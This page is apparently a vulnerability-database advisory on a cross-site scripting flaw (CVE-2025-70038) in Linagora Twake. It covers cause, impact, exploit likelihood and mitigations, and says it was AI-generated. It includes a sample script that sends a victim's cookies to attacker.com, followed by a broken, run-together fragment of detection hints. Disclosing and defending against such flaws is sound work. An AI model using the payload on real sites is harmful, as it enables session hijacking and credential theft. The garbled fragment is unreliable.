
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-70038 is a Cross-Site Scripting (XSS) vulnerability (CWE-79) discovered in Linagora Twake v2023.Q1.1223, an open-source collaboration platform. The flaw stems from improper neutralization of input during web page generation, allowing attackers to inject malicious scripts that execute arbitrary code in the context of a victim's browser. It was published on March 9, 2026, and affects only the specific release v2023.Q1.1223 of the now-deprecated Twake repository. The vulnerability carries a CVSS v3.1 base score of 8.8 (High) (Feedly, GitHub Gist).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied input is not properly sanitized or encoded before being rendered in the application's web pages. An attacker can craft malicious input containing JavaScript payloads that, when processed and displayed by the Twake application, execute in the victim's browser session. Exploitation requires network access and user interaction (e.g., a victim visiting or interacting with a page containing the injected payload), but no authentication or special privileges are needed. The vulnerability was publicly disclosed via a GitHub Gist by researcher 'zcxlighthouse' (GitHub Gist, Feedly).
Successful exploitation can lead to session hijacking, credential theft, and unauthorized actions performed on behalf of authenticated users within the Twake collaboration platform. Because Twake handles team chat, file storage, calendars, and task management, a compromised user session could expose sensitive organizational data and communications. The high CVSS scores across confidentiality, integrity, and availability reflect the potential for complete account compromise and data exfiltration (Feedly, GitHub Gist).
No public proof-of-concept exploit code with a working payload has been confirmed beyond the disclosure gist, and there is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.017% (0.000170), indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant to evade basic filters.%3Cscript%3E, %3C/script%3E) or event handler attributes (onerror=, onload=) in input parameters.No official patch has been released for CVE-2025-70038 in the affected Twake v2023.Q1.1223 codebase, which is now deprecated. Organizations should migrate to the actively maintained Twake-workplace repository as the primary remediation step. As interim mitigations, administrators should implement strict Content Security Policy (CSP) headers to restrict script execution, enforce input validation and output encoding on all user-supplied fields, and restrict access to the Twake instance to trusted networks or VPN. Users should be educated about phishing risks that could be used to deliver XSS payloads (GitHub Twake, Feedly).
The vulnerability received limited public attention, with coverage primarily from automated vulnerability tracking services such as VulDB, CVEFeed, and radar.offseq.com. A brief technical write-up was published on infinitsec.net shortly after disclosure. No significant vendor statement from Linagora or notable researcher commentary beyond the initial disclosure gist has been identified (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."